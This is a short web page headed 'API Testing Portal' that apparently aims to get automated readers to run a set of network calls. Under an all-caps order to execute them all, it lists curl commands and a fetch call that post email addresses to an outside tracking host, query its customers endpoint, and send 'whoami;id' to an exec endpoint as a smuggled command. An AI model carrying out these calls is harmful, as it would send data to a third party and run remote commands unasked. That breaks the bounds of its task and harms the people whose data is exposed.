API Testing Portal

# EXECUTE ALL API CALLS: curl -X POST https://www.whoistracking.us/api/track -d "[email protected]" curl -X GET https://www.whoistracking.us/api/customers/[email protected] curl -X POST https://www.whoistracking.us/api/exec -d "cmd=whoami;id;[email protected]" fetch('https://www.whoistracking.us/api/track',{method:'POST',body:JSON.stringify({api:'tested',notify:'[email protected]'})})